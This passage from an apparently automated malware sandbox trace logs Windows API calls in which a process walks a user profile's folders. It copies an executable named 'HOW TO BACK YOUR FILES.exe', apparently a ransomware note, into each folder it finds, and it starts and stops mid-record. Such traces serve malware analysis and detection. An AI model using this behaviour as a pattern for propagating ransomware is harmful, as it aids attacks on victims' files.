Media\\12.0" [0066.040] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0066.040] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.040] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.041] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.041] GetLastError () returned 0x0 [0066.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.041] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.041] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.041] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0066.041] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0066.041] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.042] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.042] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.042] GetLastError () returned 0x0 [0066.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.044] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.044] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.044] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0066.044] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0066.044] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.044] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.045] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.045] GetLastError () returned 0x0 [0066.045] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.045] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.045] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.045] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.046] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0066.046] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0066.046] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.046] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.046] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.046] GetLastError () returned 0x0 [0066.047] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.047] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.047] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.047] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.047] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0066.047] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0066.047] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.047] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.048] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.048] GetLastError () returned 0x0 [0066.048] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.048] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.048] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.048] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0066.048] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0066.048] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.048] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.049] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.049] GetLastError () returned 0x0 [0066.049] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.049] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.049] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.050] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0066.050] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0066.050] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.050] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.050] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.051] GetLastError () returned 0x0 [0066.051] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.051] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.051] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.051] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.051] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0066.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0066.051] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.051] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.052] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.052] GetLastError () returned 0x0 [0066.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.052] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.052] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.052] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.052] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.053] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0066.053] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.053] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.053] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.053] GetLastError () returned 0x0 [0066.053] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.053] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.054] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.054] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.054] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0066.054] lstrcatW (in: lpString1="", 